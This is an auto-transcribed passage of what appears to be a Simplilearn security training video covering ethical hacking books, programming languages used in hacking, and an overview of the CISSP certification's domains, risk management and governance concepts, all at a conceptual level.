You have already mastered the first edition you can focus on new concepts in this one now let’s head to our last book on our list at 10 we have web security testing cookbook systematic techniques to find problems first the author of this book is parkour hope and ben walther
Security testing is quite often a neglected one when it comes to the tests performed on web applications but it is a very crucial one this book teaches you how to check for the most common web security issues it also acquaints you with installing and configuring free and good security testing tools
You will also understand how your application communicates with users and this book will help you build tests pinpointed at ajax functions and help you automate the tests with the knowledge of this book and the free tools used here you can defend your site so those were the top 10 books for ethical hacking
Now that you had a look at the books let’s move on and see how simply learn can help you become an ethical hacker simply learn provides a certified ethical hacker ch version 10 course this ca certification training course provides you hands-on training that will help you master the techniques used to
Penetrate network systems and defend your system against it simply learns ethical hacking courses aligned with the latest ch version 10 by ec council here you will learn about trojans back doors and counter measures ids firewalls and honeypots advanced hacking concepts network packet analysis mobile and web technologies and advanced
Log management this course content includes an introduction to ethical hacking penetration testing and ethical hacking concepts it also speaks about sql injection iot hacking and cryptography to name a few there are no prerequisites to take up this certification training course first let’s understand the importance of knowing programming for hacking
You might wonder if programming is a necessity to become a hacker as you might be aware hacking involves breaking the protocols and exploiting a network thus being a hacker requires you to understand the languages of the software that you are focusing on hence it is required that a hacker knows
Coding having zero coding knowledge will definitely limit your opportunities in the future knowing different programming languages is undoubtedly an asset for hackers everyone wants to become a hacker today however it is not as easy as it is shown in numerous movies it takes plenty of practice and programming knowledge to
Become an ethical hacking expert if you want to become a hacker it is imperative that you have a knack for programming languages it is a known fact that some of the world’s best hackers started off as programmers if you know how to program you will be
Able to dissect a code and analyze it you can write your scripts or malware that can be used on the victim yes there are several ready-made scripts available today however you might need to apply your skills in case the available scripts don’t work well for you sometimes when script modification is
Required you should be in a position to do that in such a scenario zero knowledge of the respective programming language will definitely be a hindrance programs can also help you automate multiple tasks which would normally take a lot of time codes allow you to penetrate different
Fields you want to hack it will help you identify the plan behind an attack and defend against deadly hacking techniques and make your cybersecurity career worthwhile it will help you understand the working of the target system or application before carrying out an exploit now that we have an idea as to why
Programming is important for hackers let us understand which programming languages should a hacker learn there are several programming languages for hacking and it might be overwhelming to choose from the endless list here we are to help you with that do keep in mind that your choice of programming language will also depend on
The type of system you are targeting and your strategy let us now move on to the list of the top programming languages that are extensively used by hackers around the world as you see on your screens here we have the top 5 programming languages for hackers let us go through them one by
One number one on our list is one of the most popular programming languages today that is python python is a general purpose programming language and in the field of hacking it is mainly used for exploit writing it is referred to as the de facto hacking programming language it plays a
Crucial role in writing hacking scripts exploits and malicious programs one great feature that makes hacking easy with python is the availability of ready-made modules for example os modules are available if the target is a native operating system for networking there is a socket module and a lot more
Python socket programming can be used for discovering vulnerabilities in a system since python code helps in checking the security integrity of systems and it can also be used to exploit them python has a massive community that helps with third party plugins every day it is also an easy to read language with
A simple syntax this will be helpful for beginners you can easily write automation scripts using python and it also makes prototyping much faster moving on to our second programming language we have javascript currently javascript is one of the best programming languages for hacking web applications a good understanding of javascript
Allows a hacker to discover vulnerabilities and carry web exploitation since most of their web apps use javascript or one of its libraries knowing javascript will help you discover flaws in web applications javascript can be used to read saved cookies and security experts also use javascript to develop cross-site scripting programs for hacking
Javascript is known for carrying out attacks like cross-site scripting javascript can also be used to spread and reproduce malware and viruses easily initially javascript was a client-side scripting language however with the release of node.js it now supports back-end development this implies a larger field for exploitation
A hacker can now use javascript to snoop the type towards inject malicious code and track browsing history to name a few number three on our list is php hypertext preprocessor or php is a dynamic server-side programming language that is used to build websites hackers should understand php as it will
Help them understand web hacking techniques better especially if you’re into web hacking then getting your hands on php would be an asset php is used in server side scripting using php you could write a custom application that modifies settings on a web server and makes a target server susceptible to attacks
With the help of php you can also eliminate any vulnerabilities in your code php is one of the most powerful server side languages used in most of the web domains this shows how learning php can help you with web hacking and also help you fight against malicious attackers popular content management systems run
On a foundation of php hence having a strong knowledge of php can help you protect or compromise such websites next on a list of the best programming languages for hackers is sql sql is the acronym for structured query language although sql is not a traditional programming language it is a language
Used for only communicating with databases several systems like mysql postgresql store their data in databases sql is used to interact with such databases in order to organize add retrieve delete or edit data from a database having an in-depth knowledge of sql lets you comprehend the structure of a database thereby helping you decide
Which scripts or tools to deploy sql is used for the purpose of web hacking sql is undoubtedly the best programming language when it comes to hacking into large databases it will be impossible to counteract database attacks without a good understanding of sql using sql hackers can perform an attack
Known as sql injection attack such an attack enables hackers to access confidential information from databases sql is used by hackers to develop various hacking programs based on sql injection sql injection is used to bypass web application login algorithms that are weak such an attack can also help a hacker
View and modify confidential information from databases finally at number 5 we have the c programming language it is no surprise that we have c the mother of all programming languages on our list it is used massively in the security field it helps with exploit writing and development
The low level nature of c provides an edge over other programming languages used for hacking a hacker can use the c programming language to his or her advantage when it comes to accessing low-level hardware components such as the ram security professionals mostly uc when they are required to manipulate system resources and hardware
C also helps penetration testers write programming scripts most operating systems and computer programs are coded in c language hence learning c you will help hackers get an overview of the structure of operating systems c is also used to create shell codes root kits exploits built undetectable malware keyloggers and much more
Sometimes it is also advisable to learn both c and c plus plus as they both come in handy for hackers so those were our top five programming languages for hackers do keep in mind that the most important step of becoming a hacker is to learn various programming
Languages it will be great if you can master a variety of programming languages as your target will not be the same always on that note in addition to previously mentioned programming languages we have an additional list of languages that are also well recognized for hacking let’s have a look at our honorary mention
First we have ruby the ruby programming language has been used for exploitation for quite some time now there can be a close comparison drawn between ruby and python based on its syntax however ruby is more web focused ruby can be used to write either small or large scripts and can be used
Interchangeably with bash scripting it offers good flexibility while writing exploits ruby has been used by several hackers to exploit corporate systems it is not that easy to master ruby and that is one reason why mncs look for professionals who know ruby second we have perl although perl has
Lost its old fame it still holds value in the hacker community for exploit writing there are systems that still run on perl as it was the go to solution once it is a great language that can help you manipulate linux text files and help you create tools and exploits
Perl code bases still do occupy a considerable portion of corporate tools third on our list is html many of you might have wondered why we didn’t mention html yet yes no programming list is complete without mentioning html the hyper hypertext markup language html is a standard markup language used for creating web pages
It glows the whole internet together and it is the language of the web this shows the importance html has an understanding of html is vital to play with web applications html also finds its use in developing hybrid mobile and desktop apps html is a must if you want to master
This field having said that html is not that tough a language to learn hence it is advised to master html if you want to compromise web applications and finally at 4 we have assembly level language it is undoubtedly one of the most powerful yet hardest programming languages to learn
It is a complicated low-level programming language for hacking primitive systems assembly is one of the best programming languages the best part of assembly is that you can instruct machine hardware or software using it assembly language helps a hacker manipulate systems straight up at the architecture level it is also the most suited coding
Language to build malware like viruses and trojans it is considered to be the best language for jobs that are time critical reverse engineers use assembly language for example if you’re interested in software cracking and if you want to reverse engineer a piece of software that has already been compiled assembly
Is the go-to choice as complicated as a language sounds the results it produces are highly fruitful so those were the additional programming languages that can help you become a skilled and successful hacker we should keep in mind that a strong understanding of programming languages helps cyber security professionals stay on top of
Cyber criminals so let’s start off this tutorial by understanding the need for the cisp certification if you have seen our previous videos you would be aware of the various cyber security certifications like ccna comtia security plus cism cisa and ch to name a few you might have also come across the cssp
Certification let me tell you this is one of the toughest and most in demand certification in the cyber security field in the current times managing information security in a company can be extremely challenging with the advent of the internet and various other technologies there is a large exposure to various security breaches the
Presence of information security experts in-house helps organizations manage their i.t processes in a better way this is where a cissp professional is in demand by employers compared to the other cybersecurity professionals the demand for cssb certified professionals has grown rapidly there are nearly 50 000 job postings for the same now that
You have an idea of the demand of cssp certified professionals let’s move on to understanding what exactly is cisp cssp stands for certified information system security professional it is considered the gold standard in the field of information security this certification is taken up by id professionals it trains a candidate to become an
Information assurance professional taking up the cisp certification will help you define the design architecture controls and management of highly secure business environments you will also be called a cssb professional only after you successfully pass the cssp exam so now let’s have a look into the cssp exam requirements the primary requirement for
Any candidate is that they should have at least five years of work experience in the field of information security in addition to this it is also suggested that the candidate clears other certifications like ccna comchair security plus ceh casm and cisa to name a few cssp is considered as an advanced
Level cybersecurity certification hence it is better if the candidate clears the basic level and the managerial level certifications before moving to the cssp certification as i mentioned earlier this certification is suitable for professionals who have a minimum of five years of work experience professionals working as security consultants and
Managers network and security architects i.t directors security auditors and chief information security officers can take up the cssp certification let’s now move on to our next topic that is cisp domains this entire certification is grouped into a total of eight domains the broad spectrum of topics included in
Cssp ensure its relevance across all disciplines in the field of information security successful candidates are competent in the following eight domains they are security and risk management then we have asset security security engineering communications and network security followed by identity and access management then security assessment and testing security operations and finally
We have software development security these eight domains deal with different aspects of information security we will have a look into each of these individually and understand what each of these domains symbolize first up we have the security and risk management domain as the name suggests this domain mainly
Consists of the fundamentals of security policies compliance law and regulations professional ethics risk management and threat modeling cyber security and information security plays a major role in this domain there is a difference between cyber security and information security which is more often missed out on by people cyber security refers to
Several techniques used to protect the integrity of networks whereas information security refers to processes and tools deployed to protect sensitive information to implement cyber security we have a list of approaches like compliance based ad hoc and risk based in compliance based security measures are decided based on regulations while
In ad hoc security measures are based on no specific criteria in risk-based security measures are based on unique risks depending on the organization let’s now have a look at the cia triad here c stands for confidentiality i for integrity and a for availability confidentiality integrity and availability have served as the industry
Standard for computer security since the time of the first mainframes confidentiality means that information and functions can be accessed only by authorized parties for example military secrets integrity means that information and functions can be added altered or removed only by authorized people and availability means that systems
Functions and data must be available on demand now that we have understood the cia triad let’s have a look at the grc trilogy this trilogy is a structured approach adopted by organizations to align it objectives with business objectives first up we have governance such a program has motives like ensuring
Goals are achieved providing strategic plans and so on governance is taken care of by the senior professionals of an organization next up we have risk management here the organization looks into mitigating all types of risks such as investment physical and cyber risks finally we have compliance as discussed previously compliance refers to abiding
By the defined laws and regulations so who do you all think develops a security policy which is used to achieve the organization’s goals well it is done by the senior management of an organization let’s have a look at the characteristics of these security policies first and foremost these policies should support
The vision and mission of the company all the business units should be integrated in these security policies they should also be regularly updated and finally it is important that these security policies should be easy to understand so that everyone can abide by them without any problem in addition to
Security policies our risk analysis team is also formed in organization to perform the analysis of each known risk there are various steps to perform risk analysis let’s have a look at each of these first the team makes an assessment of the value of the company’s assets
Then there is an analysis made based on the risks to assets and finally the team discovers solutions to mitigate these risks now that was all about the first domain of cisp security and risk management let’s have a look at the second domain asset security asset security deals with the collection and
Protection of assets such as data and devices here we will be looking into data classification data management data remnants and data loss prevention so in data classification the data owner classifies data a data owner can be an individual or a group of people who created the information and are directly
Responsible for it this classification is done based on a set of predefined criterias at the end the classification is annually reviewed to see if there has to be some change incorporated data management involves managing the information life cycle needs of an enterprise in an effective manner it
Also ensures that the data complies to the set standards and finally data management also ensures data validity and integrity moving on to data remnants it is a term used for the residual of digital data that is present even after trying to erase the data data remnants should be avoided as data should be
Completely destroyed to tackle data remnants we have methods like overwriting and destruction to name a few in overwriting other information is written over the data several times so that the original data cannot be recovered in destruction data in the storage device is physically damaged to make recovery difficult asset security
Also looks into data loss prevention here several measures and risk assessments are performed to ensure that information is only available to authorized users let’s now move on to our third domain security engineering as the name suggests this domain talks about security architecture security models cryptography and physical security security architecture
Establishes a common practice for creating analyzing and using architecture description within a particular domain security architecture takes the help of tcb that is trusted computing base security parameter and reference models to implement security cryptography is also a part of security engineering in cryptography information is secured by converting data from a
Readable format to a non-readable format and vice versa moving to our fourth domain we have communications and network security this domain is all about network structures transmission methods and security measures used to achieve cia in an organization osi model is the foundation of networking this model that is the open systems
Interconnection model osi model describes how data is transferred from one computer to another the osi model consists of seven layers starting from physical layer then data link layer network layer transport layer session layer presentation layer and finally application layer in the first layer that is physical layer transmits raw bit
Stream over the physical medium then data link layer defines the format of data on the network network layer provides logical addressing and it also provides path determination using local addressing the fourth layer that is transport layer provides end-to-end connections in this layer data is transmitted using transmission protocols
Including tcp and udp the session layer maintains connections and it is also responsible for controlling ports and sessions the sixth layer that is the presentation layer ensures that data is in a usable format and finally in the seventh layer that is the in the application layer human computer interaction happens here applications
Can access the network services the communications and network security domain also talks about firewalls we can define a firewall as a hardware or software which is used to block the incoming or outgoing traffic from the internet to your computer then we also have the ids ids is known as the
Intrusion detection system this is designed to detect unauthorized access to a system ids is used together with a firewall and a router moving to identity and access management a fifth domain let’s have a look at what this domain is all about this domain of cisp is all about the access control identification
Authorization and attacks on access control and its counter measures to be able to access a data set or a resource a subject has to be identified authenticated and authorized identity management kerberos and access criteria are few of the crucial fields here in identity management through automated means users are identified and
Authenticated this domain also speaks of kerberos an authentication protocol that is based on symmetric key cryptography and provides end-to-end security access to data shouldn’t be granted to anyone and everyone in fact it should be granted based on the level of trust and the job role in the organization it is
Also better if it is provided based on the location and the time let’s now have a look at our sixth domain security assessment and testing so in this domain we will look into audit security control assessment and testing reports as you might have heard of the term audit it is
Nothing but a repeated process wherein an independent professional evaluates and analyzes evidence then we have vulnerability assessment wherein it risks are identified and evaluated it helps in identifying quantifying and prioritizing vulnerabilities a well-planned and executed assessment and test strategy can provide valuable information about risk and risk mitigation the assessment and test is
Executed by a working group called the integrated product team testing is performed to check the data flow between the application and the system up next we have the security operations domain the seventh domain of csp is all about investigations monitoring and logging disaster recovery and change management
Here we will look into the fields of digital forensics incident management and perimeter security investigation of a computer crime is also known as computer foreign six in digital forensics data is examined to identify recover and analyze opinions about digital information incident management works to restore the services to normal
As soon as possible a team called the incident response team is deployed to handle such emergencies incidence response is defined as a practice of detecting a problem determining its costs minimizing the damage resolving the problem and documenting each step this team provides management with sufficient information and defends the
Company against future attacks in perimeter security there is perimeter defense which allows us to detect and keep a check on unauthorized physical access this field also controls the access to the facility moving on to our eighth and final domain we have software development security as the name suggests this domain talks about
Security in a software development lifecycle here we will be looking into topics like api malware spyware adware social engineering attacks and sql injection attack let’s start off with the application program interface known as api api is basically a collection of protocols and functions used to create applications it supports formats such as
Representational state transfer rest and simple object access protocol rest is nothing but using the present features of the web in a simple way and soap which is an acronym for simple object access protocol is a messaging protocol for exchanging data among computers now let’s move on to malware as a security
Threat malware is a term which refers to malicious software viruses ransomware and worms we can also call trojan virus as a form of malware which is capable of disguising itself as a legitimate software malware is basically a broad term that refers to a variety of malicious programs one way to protect your
Software from malware is to always double check your downloads moving on to our next security threat spyware as the name suggests this is a software that typically spies on your system spyware is also a type of malware which is used to secretly gather information of the
Victim to give it to a third party those programs that secretly record all that you do on your computer are called spyware it is always advised to turn on pop-up blockers to prevent spyware next up we have adware adware is also known as advertising supported software
It is a type of malware that constantly displays ads and pop-ups some of such ads can also gather your information at times adware is not all that dangerous but it is a hassle as it is a gateway to unwanted advertising on the screen and it can also change the browser home page
Adwares are known to display unwanted annoying advertisements on your screens let’s now have a look at social engineering attacks it is basically the art of manipulating people so that they end up giving their confidential information this attack lures victims into handing over their confidential data this attack takes
Place by tricking the human mind the most common social engineering attacks are fishing spear fishing and whaling fishing attack phishing attack is a practice wherein the hacker usually sends fraudulent emails which appear to be coming from a very trusted source this is done to install malware or to
Steal sensitive data like credit card information and various other login credentials spear phishing attack is a variation of phishing here the attacker targets a specific individual or a group of people and in wailing phishing attack wealthy powerful and prominent individuals are made targets moving on to our next
Attack we have sql injection attack sql injection attack is a type of code injection attack in a database driven website the hacker manipulates a standard sql query it allows attackers to tamper with the existing data here malicious code is inserted into the sql server to obtain information so in cissp
As with every security course we start off with the cia triad now here cia is confidentiality integrity and availability so it starts off with every security mechanism when we talk about security and we want to keep things secure what is it that we want to secure
It is the data of an organization that is the most valuable asset to the organization and that’s what we want to secure when we say that we want the data to be secured we basically talk about three aspects for that data the first and the foremost that the data needs to
Remain confidential the second aspect that the trader needs to be trustworthy and the third concept that the data should be available to all authorized users when and where they require it so going back to the first point when we say we want data to be confidential what
Do we mean by that by confidentiality we talk about that data being made available only to authorized users after you have authenticated them insured or assured of their authenticity and only then you’re going to give access to that data right so even if you go into an organization an organization has a
Hierarchy of governance right so only certain people with certain clearances or certain job titles can have access to certain amount of data whereas other people may not have access to it for example a person working in the sales department will not have access to data that is accessed by the hr department
Thus that’s what we are looking at classification of data and keeping it confidential only making it available to those people who require it when we say trustworthiness or the integrity of that data the integrity is where the data has been altered modified removed deleted by unauthorized people so we want to
Prevent that which means when we say we want the integrity intact we want to ensure that only authorized people can modify alter or remove data if they are allowed to do so so that’s where the authorization and authentication comes into the picture again and data needs to
Be available for me to safeguard data i can just lock it up in a safe throw the safe in the depth of an ocean and say that the data is secure because it cannot be leaked out but that data is no longer available to authorized users
Hence the data is useless for me data would have value when the data remains confidential has its trustworthiness intact and is still available to all the users that are authorized to access it so when we talk about security we want these three aspects to be implemented on
Any and every digital asset that the organization has and thus once these three points are guaranteed or at least assured to a certain extent we can then say that the data or that particular asset is secured moving on let’s talk about information security information security is the process of protecting
Data and information system so in the cia as we talked about it when we said what do we want to protect we want to protect all the information assets or the technical assets that we have from any of the vulnerabilities that can be identified so we want to restrict
Unauthorized access and use we want to restrict deletion accidental or intentional if they have not been authorized to do so modification of data so the integrity part and destruction of data destruction could not only be deleting data but it could be something like ransomware where the data gets
Encrypted so it’s still there it’s just not accessible to you now information security ensures the implementation of these following aspects the first and foremost comes from information security policies which is the governance aspect of it the policies are designed to have a implementation of security in an organization that helps the business
Processes to be executed in a secure manner where are these policies coming from they come from standards or guidelines which are globally available and based on which we can start developing our security policies for example if i want to develop a security policy in my organization i might want
To depend on frameworks like iso 27001 cobit or something similar once i have these standards set i would come back to procedures procedures being how are these standards to be executed right for example in my policies i ensured that i want encryption of aes 256 to be
Implemented or rather in the policy i determined that we want encryption to be implemented on a data set because based on the classification of those data so in my policies i would determine how the classification is going to work how data is going to be classified on what
Parameters and thus once the data gets classified we are going to come back to standards where we say if it is classified as a confidential data we want to use encryption to protect that data and we want aes 256 to be utilized for encryption so how do we go
About it how do we implement the encryption that’s where your procedures come into the picture your guidelines are troubleshooting mechanisms optional documents so if somebody has trouble following the procedures they might want to go into the guidelines and see how to troubleshoot the scenario that they are facing baselines are basically the
Minimum achievable target that you want to go with with these policies so let’s say when i say i want to have a baseline on a server where for the server to be published onto the internet or to be used in production environment it has to meet a certain criteria which means i
Can go back to the hardware and i can say the server needs a hardware configuration of x y and z let’s say a processor a xeon processor with 16 cores 128 gigs of ram so that’s a baseline that i need for a particular server for it to be put into production environment
For a particular use anything above that is acceptable but nothing should go below that then comes the risk management while we are implementing these policies procedures we have those standards in place if we face any risk during that period or if we face any threat or a vulnerability is identified
During this period all these terms we are going to discuss in a little bit so when we identify vulnerabilities or threats that’s where our risks come into the picture the risk management comes in saying okay this is a risk that we have identified and now how do we want to
Mitigate the risk then the security organization comes into the picture the day-to-day activity of how security is to be implemented and for all of these procedures policies baseline standards to be implemented to be ensured that there are to be assured that they are working properly we need to make our
Employees aware that these policies exist this is something that they need to follow thus the awareness or the security education comes into the picture here the security education is more focused on helping employees adhere to the company policies and standards rather than educating employees about security we don’t want to make everybody
A ethical hacker we just want to ensure them or we want to assure the organization that everybody has been warned about policies procedures security requirements and they are going to follow those requirements for example a password policy where you have to adhere to a specific password policy to
Ensure passwords are created at the same time there is another password policy which says that you should not share passwords with your colleagues no matter what so for me for my employees to follow that i need to make them aware that these policies exist and there are
Repetitions if they do not follow these particular policies so coming back to the governance part what is governance since we have been talking about it governance ensures that the security strategies are aligned with business objectives and consistent with regulations so what does it guarantee appropriate information security activities are being performed based on
What based on the policies that we have created based on the standards that we have and the baselines that we would have created so security has to be comparable right so if i say i have secured against particular attacks the attacks have to be identified and then compared to those particular attacks i
Can say i have mitigated these activities by having specific security controls thus i can say that i am secure the governance aspects keeps a watch on all the security controls to see that those security activities are insured are being implemented and are performing to the best of their abilities that’s
Where your governance comes into the picture the risks being reduced so the risk management also comes under the governance where you are looking at newly identified risks and you’re then implementing security controls that would mitigate these risks then we are looking at information security investments appropriately directed so
When i say i want a security control which would be a firewall ids ips antiviruses whatever is required it needs to have a return on investment which is acceptable for the organization you don’t want to spend up too much of money in security thus creating losses for the organization when you say a
Business a business objective is always to make money rather than lose money so security should be a supporting feature to the business objectives where the services are being provided by the business in a secure manner in such a way that they can still have a positive return on investment on the services
That are being provided and the executive management can determine the program’s effectiveness this is the major part because we have to even in any compliances audits technical audits we have to prove that whatever we have implemented actually works is effective does mitigating the risk if your security controls are not effective then
You have just wasted a bucket load of money and have not achieved any security measures in your exercise moving on to security controls security controls are measures taken to safeguard an information system from an attack basically for the cia triad the confidential and integrity and availability so security controls could
Be administrative controls technical controls of physical security controls what are administrative security controls there would be policies procedures that we have in place so the password policy becomes an administrative control where the management has made everybody aware that the password needs to meet a particular complexity should not be shared and thus
Becomes an administrative security control a technical security control would be where we are implementing this policy and thus when i try to create a password there is a software that maps the password to the complexity requirements assures or ensures that the complexity requirements have been met and does allows the password to be
Accepted or rejects the password as the case may be that is a security control a physical security control may be let’s say a cctv camera which you are going to use to monitor people and ensure that nothing untoward happens it’s not only against physical crime but let’s say access to a particular room
Where nobody’s seen tailgating uh maybe monitoring a server room which is very well secured and ensuring that unauthorized people do not get access or purposefully or intently do not access that area at all times so these are the three levels of security controls that can be implemented to enhance the
Security of an organization then we come to security policies policies is an overall broad statement produced by a senior management that dictates the role of security within the organization for example the password policy that we talked about it just said that it needs to meet a certain complexity which is a
Broad statement that is being made by the management saying we want to adhere to this policy to ensure that we do not get hacked by brute force attacks or dictionary attacks or whatever it is the broad statement is trying to prevent certain attacks from happening on the organization how it is implemented
That’s where the procedures and everything else comes into the picture it must integrate security into all business processes so if i start creating a policy which shows that the complexity should be so high that the password should be at least 20 characters strong that would be detrimental to the organization’s health
Because people may not remember those passwords or resetting those passwords or having technical mechanisms technical security controls in place to implement that kind of stringent security may be too expensive to have so whatever policies are created they need to be in in line with the business processes as
Well the policy must be reviewed and modified periodically or as company changes so as and when the company becomes more mature and can have more levels of security they must look at their policies again and redefine them or as a company grows or changes market scenarios or changes business processes
These policies may become redundant so you want to look at those policies and implement newer policies or modify the existing policies to suit the business processes in a better manner it must support vision and mission of the organization a business once established will always have a long-term vision for
Example the e-tailer example that we are talking about for me to open an e-tailer e-retailing website i don’t want it to be periodic i don’t want it to be for a month or something like that i want to achieve success in that factor and i
Want to create a plan of where i want to reach let’s say in the next five years so how do i achieve that that’s something that i need to plan as a business plan all my security mechanisms that are in place should be in alignment with the business plans business visions
Across the number of years that we have envisaged the business to perform so that’s where the policies come into the picture policies are always long-term not short-term documents but need to be periodically reviewed and modified as the business grows or business changes its posture then looking at compliance
Compliance means confirming to a rule such as a specification policy standard or law so we have looked at compliance from a perspective where we talked about iso 27001 or pci dss or those frameworks now these are not laws but these are standards of frameworks that have been
Created over a period of time through experience and these are targeted towards organizations towards specific industries for example pci dss is only towards finance organizations where they have payment gateways in place the iso 27001 is a more generic policy which can be implemented by various organizations hipaa health insurance portability and
Accountability act is an american act that talks about health-related data of its citizens so these are compliances these may not be laws but you need to adhere to these to be effective and to be allowed to conduct business in that particular industry then we have code of
Ethics code of ethics state safety of the commonwealth duty to our principles and to each other requires that we adhere and be seen to adhere to the highest ethical standards of behavior therefore strict adherence to this code is a condition of certification what are the ethics protect society the
Commonwealth and the infrastructure act honorably honestly justly responsibly responsibility and legally prove diligent and competent service to the principles advance and profession now the code of ethics are codes created by iic square for the cissp professional and you need to adhere to these codes if they identify violation of these codes
From any member they would debar the member strip them of the certification and even blacklist them to based on whatever ethics they have violated so even before the exam you have to go through the code of ethics you have to accept the code of ethics in
The exam you may get get up to five to six questions just on code of ethics then comes the legal systems that’s where the law comes into the picture law could differ from country to country or from region to region and thus depending on which country you are in
You may need to be aware of those laws of those countries as far as cssp is concerned ise square is concerned they are an american organization so they would talk about mostly american laws and a few european laws or directives as well so there are three different laws
That we talk about civil common and religious laws depends on the country the culture of that particular country the information security professional should understand the different legal systems followed internationally so you also may come across the classification as civil law criminal law and law of torts civil law is basically a law where
Let’s say a contract has been breached and it’s not criminal in nature you just want to sue an organization for breach of contract criminal law is where something criminal has happened under the particular act of that particular country like let’s say a murder or an attack that has happened a physical
Attack or something got stolen and the third one was the law of torch where it’s more of a compensatory law where you can file a case a civil suit demand compensation in lieu of the wrongs that have happened to that particular organization or that individual then comes the personal security the person
The other people inside the organization need access to data to complete their assigned work and hence have the potential to misuse these privileges and thus you should have personal security as well now when we talk about hiring practices for people most of the organizations perform background checks
And we get confused why these background checks are being done the background checks are essential to the health of the organization where you are ensuring that the person is not a malicious person has the prerequisite certifications or the qualifications have never been debarred or have never been prosecuted do not have a criminal
Background thus preventing physical attacks on the organization for example a competitor may attempt to place in your organization a spy to spy uh to gather information on the secrets of that organization and report it back to the competitor a background check may reveal that this person was previously
Employed by a competitor and thus you might want to verify that how that employment got terminated when did it get terminated or is this person misusing anything or misrepresenting any aspect of his or their life then you also need to get confidentiality agreement signed with them for example ndas non-disclosure agreements data that
Is being shared with them the ownership of that particular data and what are the repetitions if that confidentiality is breached by that particular person conflict of interest agreements for positions handling competitive information as you go higher up in the organization you might come across contracts where it prohibits a
Particular person in engaging and act into the same activity with the competitor for a particular period of time so if there is a conflict of interest when you are hiring a person where they have signed in such a agreement with another competitor or another organization you don’t want to
Embroil yourself in a lawsuit where uh the other organization may sue you for hiring a person while they were still under that particular contract so it’s not only to look at the background of these people but to safeguard the organization from any lawsuits or any violations of contract as well get the
Non-complete agreements for the positions in charge of unique corporate processes that again goes on to say if you’re going to leave the organization you cannot start up a competing business similar to the organization’s business and so on so forth now let’s come back to the technical aspect and start
Talking about vulnerability threats and risk now what is a vulnerability it is nothing but a weakness in a system or a process implies the absence of a counter measure vulnerability is internal and is more easily managed so it’s uh basically a flaw or a misconfiguration or a design
Flaw or uh something like using defaults username passwords configurations where if that particular flaw is misused it will lead into a security event on that particular device for that particular organization so when we say a security event it has to be detrimental in nature so if somebody is
Using a weak password that can easily be cracked that is a vulnerability where you have identified a weak password and then you want to prevent that vulnerability by imposing a security control or a counter measure the security control here starts off with the policy of having a robust security
Policy where a password policy comes in that describes the complexity of a particular password and then you talk about a technical countermeasure where you have implemented an identity and access management plan which would ensure that the person creating that password adheres to the complexity of that particular policy then a threat the
Threat is the possibility that the vulnerability might be exploited which will result in loss so if somebody has created a weak password and it has been allowed that’s a vulnerability which can be exploited by the usage of brute force attacks or dictionary based attacks to crack passwords if the password is cracked
Somebody unauthorized may get access to that data thus resulting in a loss for that organization so the threat is the possibility of that particular vulnerability being exploited and then comes the risk the risk is basically the likelihood of that attack being happening so i have a weak password it
Can be exploited by a brute force dictionary attack the likelihood of that attack is what determines the risk level for me now the likelihood will always be hypothetical but we don’t want to run helter skelter and we do not want to take uh the possibility to extreme so that’s where your business processes
Come into the picture your security policies come into the picture based on the business processes and the policies implemented if i have a weak password what would be the loss that i would face for that particular person for example a fresher coming into an organization having a weak password but having
Limited access to uh data would have a lesser risk because of the loss being lesser than a ceo of an organization using a weak password and thus getting exploited because the ceo will have access to more proprietary data that if gets into the competitor’s hand would
Lead in huge losses thus the same risk of having a password cracked for refresher will have lesser loss thus a lesser risk compared to the same risk to a ceo where the loss would be higher so a threat could also be in multiple aspects threats could be natural that
Means to fires flooding tornadoes anything that is an act of god that can happen with minimal human interaction or the second threat would be man-made where man is responsible for it like theft hacking writing war anything that is created by a man or rather humans and technical in nature could be software
Bugs where vulnerabilities create are created or server failures where something technical has gone wrong and you need a technical as skilled person to come in and repair that particular aspect then the fourth one would be a supply system failure or a chain supply failure where you have dependencies for
Example any organization will have a dependency on an electricity service provider where they are providing electricity as a service which powers on the iot infrastructure if the service provider fails and there is electricity or a power cut your systems are not going to work thus you need a secondary
Mechanism to prevent that threat from being realized once we have identified these threats we have identified these vulnerabilities and we have identified the likelihood and the probability of that attack that’s where we come across the risk management exercise now what is risk management risk management is a hypothetical exercise where we have
Identified a vulnerability we have looked at the threat that it may have and the likelihood of that threat being realized once we have identified the threat uh the risk level that’s where the risk management comes into the picture reading from the slides a core component of enterprise security program
Why because we need a baseline and we compare security to a baseline for example i’ve got a firewall that has been configured in a particular manner now when i do a vulnerability assessment on the firewall it the vulnerability assessment gives me a report that states that some of the rules may now be
Redundant thus allowing access to unauthorized users this becomes a risk or this becomes a threat if this threat is identified by unauthorized people they would then try to attack this firewall to gain access to that data which they are unauthorized to access thus leading to losses for an organization
What is the likelihood of this happening if the likelihood is high or low that’s what the risk management program is all about right and based on this risk we implement security controls we manage the security controls and then we verify the security controls for future risks to coming into the picture
It must be defined and it is always defined as an ongoing project because risks will always change based on the businesses based on the security controls that you have this will give a guidance to an organization of how security is being implemented how it has enhanced over a period of time and how
Security mature that organization has become because of the risk assessment program it also helps you to satisfy two aspects due diligence and due care what is due diligence due diligence is basically the research that organization does in identifying those risks and mitigating them the due care is the
Actual part of mitigation where you have implemented a security control to mitigate the risk that you have identified so if companies negligent that means if the company doesn’t have a risk management program it is not going to be that security oriented or the security is not going to
Be that great does the company may not comply to laws regulations and standards thus causing them penalties lawsuits and other reputations in the industry based on whatever they are doing for risk management we come to frameworks the frameworks are used to categorize information systems so that we can
Identify threats or risks based on the classification so this classification helps us determine the criticality and the sensitivity of information system right so what is the sensitivity and criticality it basically gives us an understanding of the value of the asset that we have so if you go back to domain
One the asset value or the asset identification asset security that’s where it comes into the picture obviously a database server is going to be more secure than an end user laptop based on the data that they have thus the criticality of the system for a database is much higher than the end
User’s laptop then we look at the security controls that can be implemented then for those the frameworks like iso 27001 comes into the picture there is kobe there is there are a lot of frameworks out there nist 800 iphone 53 then we talk about assessing the security controls once we have placed
Those security controls we need to verify those controls are placed properly they actually mitigate the risk and are appropriate to correctly mitigate that particular risk that they are creating then looking at authorizing information systems grant information systems operations based on risks determined so you have identified risks
You have authorizing some of them some of the devices to function in a particular manner based on which some of those risks would be mitigated or would be reduced to an acceptable level so in the cissp we talk about a lot of risk assessment strategies we look at how we
Can manage risks the four different types of managing risks would be one is to mitigate other is to transfer the third is to accept it and the fourth one is to neglect the risk so uh in the cissp it talks in great details about those risk assessment strategies uh we
Are talking about the four types of risk mitigating strategies they are risk avoiding or avoiding the risks accepting the risk transferring the risk and limiting the risk so uh in the course we basically talk about a lot of risk strategies and how to mitigate these risks and
